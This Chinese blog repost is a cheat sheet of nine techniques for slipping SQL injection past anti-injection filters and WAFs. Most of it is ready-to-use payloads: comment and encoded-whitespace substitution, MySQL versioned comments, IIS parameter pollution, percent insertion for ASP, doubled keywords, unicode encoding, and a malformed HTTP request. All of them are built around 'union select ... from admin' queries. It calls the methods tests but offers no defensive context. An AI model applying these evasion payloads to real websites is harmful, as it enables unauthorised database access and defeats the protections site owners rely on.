waf绕过:绕过防注入系统 包括WAF的测试方案集合

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

原文地址:http://bbs.10hst.com/viewthread.php?tid=39&extra=page%3D1
作者:ay暗影

======绕过防注入系统,包括WAF的测试代码=======
方案一、  把测试代码的空格替换成  /**/  或者+     (注:/**/ 和+ 不要进行url编码)

?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
03
如: id=1 or 1=1
    id=1/**/or/**/1=1
    id=1+or+1=1

方案二、把空格替换成非可见字符    %09 %0A %0D %0B

?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
03
04
如: id=1 or 1=1
    id=1%09or%091=1
    id=1%0Aor%0A1=1
    id=1%0A%0Bor%0A%0B1=1

方案三、把关键字用 /*!*/包起来,注,这个方法只适用于mysql数据库的站点

?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
如: id=1 and 1=1
    id=1 /*!and*/1=1

方案四、使用参数污染法攻击绕过,注,该方法只适用于webserver是微软的IIS的情况下

?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
如: id=1 union select 1 from admin
    id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin

方案五、使用%绕过,注,该方法只适用于asp/aspx

?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
如: id=1 union select 1 from admin
    id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in

方案六、使用%23 (明文为#号)和%0A配合使用绕过,注,这个方法只适用于mysql数据库的站点

?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
如: id=1 union select 1 from admin
    id=1%23afafasdf%0Aunion%23afafasdf%0Aselect%23afafasdf%0A1%23afafasdf%0Afrom%23afafasdf%0Aadmin

方案七、使用重复关键字绕过

?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
如: id=1 union select 1 from admin
    id=1 ununionion seleselectct 1 frofromm admin

方案八、使用unicode编码绕过

?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
如: id=1 union select 1 from admin
    id=1 %u0075%u006e%u0069%u006f%u006e select 1 %u0066%u0072%u006f%u006d admin

方案九、使用畸形包绕过,只适用于 asp/aspx,详情可以看80sec的站点

?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
03
04
05
06
07
08
:    id=1 union select 1 from admin
  
GET /test.asp HTTP/1.1
Host: 172.16.15.50
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
  
t=3*/select/*

以上是我收集的方法,谁还有新的方案,欢迎补充

Tags:

waf绕过,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
waf绕过:绕过防注入系统 包括WAF的测试方案集合